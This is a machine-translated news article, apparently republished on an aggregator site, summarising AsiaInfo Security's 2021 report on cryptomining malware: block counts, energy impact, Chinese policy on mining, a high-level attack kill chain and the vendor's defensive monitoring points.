AsiaInfo releases a special report on mining viruses in 2021, focusing on the evolution and governance of mining viruses

Others 2022-04-20 04:17:09 views: 0

Contributed | Trend Micro

Produced | CSDN Cloud Computing

Recently, the "AsiaInfo Security 2021 Mining Virus Special Report" was officially released (hereinafter referred to as the "Report"). The "Report" is based on the mining virus incidents monitored, analyzed and disposed of by the AsiaInfo Security Threat Intelligence and Service Operation Department in 2021, analyzes and summarizes various mining viruses and attacks, and deeply explores the possible evolution in the future. In order to help more users make security plans with safer, more efficient and more comprehensive actions, it provides a reference path for mining virus governance.

A comprehensive review of the mining virus event in 2021 

In 2021, AsiaInfo blocked a total of 516,443 mining viruses. Based on this, the "Report" sorts out the typical mining viruses and incidents of the year as a whole, and summarizes the characteristics and purposes of their attacks. It is found that some mining viruses attack enterprise cloud servers in order to maximize profits; some mining viruses cooperate with botnets to quickly Seize the market; in addition, some mining viruses have made breakthroughs in their own technology, using a variety of vulnerability attack methods, not only that, mining viruses are also taking an innovative route, falsifying CPU usage, and using Linux kernel rootkit for stealth mining Wait.

Figure 1 Review of mining virus attacks in 2021

Rising virtual currency prices push mining to highs

In 2021, the new crown virus is raging around the world, and the economy is turning from real to virtual at an unprecedented speed. The virtual currency with its own "safe haven" halo has experienced several substantial growth in the past year. Among them, the well-known Bitcoin (Bitcoin) BTC) rose more than 90%, while Ethereum (ETH) surged more than 540%. Due to the skyrocketing rise of virtual currency, driven by interests, hackers also targeted the virtual currency market, using mining scripts to realize traffic realization, making mining viruses one of the most frequently used attack methods by criminals.

Figure 2 Bitcoin trend chart since the beginning of 2019

The proliferation of mining viruses affects the "double carbon" goal, and the comprehensive rectification has achieved initial results

Mining viruses not only bring economic losses to users, but also bring huge energy consumption. According to industry research, in 2021, the annual power consumption of bitcoin mining in my country will be about 79.1 TWh, accounting for 0.95 of the country’s total power consumption. %, which produces about 34.8 million metric tons of carbon emissions. If there is no policy intervention, it is estimated that in 2024, the annual energy consumption of Bitcoin mining in my country will reach a peak of 296.59 terawatt-hours, generating 130.5 million metric tons of carbon emissions, accounting for about 5.41% of my country's carbon emissions from power generation.

In order to promote energy conservation and emission reduction, and achieve carbon peaking and carbon neutrality goals in 2060, in September 2021, 10 departments including the National Development and Reform Commission jointly issued a notice requiring a comprehensive rectification of virtual currency "mining" activities. Through AsiaInfo's data tracking from 2016 to 2021, it was found that with the downward trend in the number of domestic mining viruses in 2021, it has been confirmed that my country's comprehensive rectification of virtual currency "mining" in 2021 has achieved initial results.

Comprehensive analysis of the mining attack kill chain XDR can establish an effective interception point

In order to help national units to clean up and rectify virtual currency "mining" activities, AsiaInfo started from this year's mining events, analyzed a large number of mining virus samples, summarized the mining virus killing chain and new trends in technology, and provided mining services. Mine virus safety advice.

Figure 3 Mining virus killing chain and 14 key monitoring points established by AsiaInfo

The killing chain of mining virus attack includes seven steps: reconnaissance and tracking, weapon construction, lateral penetration, load delivery, installation and implantation, remote control and execution of mining. Attackers first search for weaknesses in the target, then use vulnerabilities and backdoors to craft a weapon carrier that can be delivered, deliver the weapon package to the target machine, then run the exploit code on the victim's system and install malware at the target location for the attacker. Establish a path that can remotely control the target system, and finally release the mining program, execute mining, and the attacker can remotely complete his intended goal.

In response to the above-mentioned attack kill chain, AsiaInfo Security has set up 14 key monitoring points, through the information mast Deep Threat Discovery Device (TDA), letter cabin cloud host security (DeepSecurity), letter end virus protection (OfficeScan), letter end terminal detection and response System (EDR), network detection and response (TDA+Spiderflow), anti-virus wall (AISEdge), investigation and analysis threat hunting services, etc., multi-dimensional discovery, detection, response, killing, recovery and prevention of mining viruses.

The report also contains detailed analysis and recommendations for:

  • Vulnerable weapons and blasting tools are the best intrusion weapons used by mining gangs, and they are using new vulnerable weapons faster and faster, which puts forward higher requirements for defense and security response capabilities.
  • Because of its excellent anonymity, Monero is favored by mining groups. Monero has become the preferred currency for mining viruses. Advanced escape technologies such as "no file" and "steganography" are prevalent, and security confrontation continues to escalate.
  • In recent years, the infrastructure construction of the domestic cloud industry has developed rapidly. The government and enterprises are actively moving to the cloud. Enterprise clouds and data centers with a large number of industrial-grade hardware will become the key targets of mining viruses.
  • The mining virus continues to mine profit-maximizing "miners". By introducing botnet modules and cooperating with botnets, relying on the huge infection base of botnets, it expands rapidly, occupying the market, and at the same time increasing its popularity.
  • The mining virus has been fully evolved, and it is difficult to achieve effective protection through a single security product. It is necessary to combine the characteristics of the virus to carry out targeted multiple detection and protection.

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=324124056&siteId=291194637
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com